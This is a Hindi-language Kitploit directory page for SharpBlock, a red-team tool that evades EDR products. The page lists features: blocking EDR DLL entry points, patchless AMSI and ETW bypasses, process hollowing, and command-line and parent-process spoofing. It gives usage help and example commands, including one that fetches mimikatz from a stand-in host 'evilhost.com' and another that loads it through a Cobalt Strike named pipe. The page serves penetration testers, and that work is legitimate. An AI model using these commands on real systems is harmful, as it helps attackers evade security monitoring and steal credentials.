Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SharpBlock — EDR के सक्रिय प्रोजेक्शन DLLs को बायपास करने की एक विधि जो entry point निष्पादन को रोकती है | Kitploit
उपकरण/GitHubGitHub/ccob/sharpblock
रेड टीमिंग
GitHubccob/sharpblock

SharpBlock

EDR के सक्रिय प्रोजेक्शन DLLs को बायपास करने की एक विधि जो entry point निष्पादन को रोकती है

रिपॉजिटरी देखें
1.2k16525 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SharpBlock

EDR के सक्रिय प्रोजेक्शन DLL को एंट्री पॉइंट निष्पादन को रोककर बायपास करने की एक विधि।

विशेषताएं

  • EDR DLL एंट्री पॉइंट निष्पादन को ब्लॉक करता है, जो EDR हुक्स को लगाए जाने से रोकता है।
  • पैचलेस AMSI बायपास जो रनटाइम पर Amsi.dll कोड पैच खोजने वाले स्कैनर्स से अज्ञात रहता है।
  • होस्ट प्रक्रिया जिसे इम्प्लांट PE से बदला जाता है जिसे डिस्क, HTTP या नेम्ड पाइप (Cobalt Strike) से लोड किया जा सकता है।
  • इम्प्लांटेड प्रक्रिया छिपी होती है ताकि हॉलो की गई प्रक्रियाओं की तलाश करने वाले स्कैनर्स से बचने में मदद मिले।
  • कमांड लाइन आर्गुमेंट्स को स्पूफ किया जाता है और प्रक्रिया निर्माण के बाद स्टील्थी EDR डिटेक्शन विधि का उपयोग करके इम्प्लांट किया जाता है।
  • पैचलेस ETW बायपास।
  • जब कैली किसी ब्लॉक किए गए DLL के एड्रेस स्पेस की सीमा में होता है तो NtProtectVirtualMemory कॉल को ब्लॉक करता है।
root@kitploit:~
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

उदाहरण

mimikatz को HTTP पर लॉन्च करें, notepad को होस्ट प्रक्रिया के रूप में उपयोग करते हुए, SylantStrike के DLL को ब्लॉक करें

root@kitploit:~
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

mimikatz को Cobalt Strike बीकन के माध्यम से नेम्ड पाइप पर लॉन्च करें, notepad को होस्ट प्रक्रिया के रूप में उपयोग करते हुए, SylantStrike के DLL को ब्लॉक करें

root@kitploit:~
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

नोट, upload_file बीकन कमांड के लिए, upload.cna को Cobalt Strike के Script Manager में लोड करें

संबंधित ब्लॉग पोस्ट्स:

  • https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/
  • https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/
  • https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
टूल डाउनलोड करें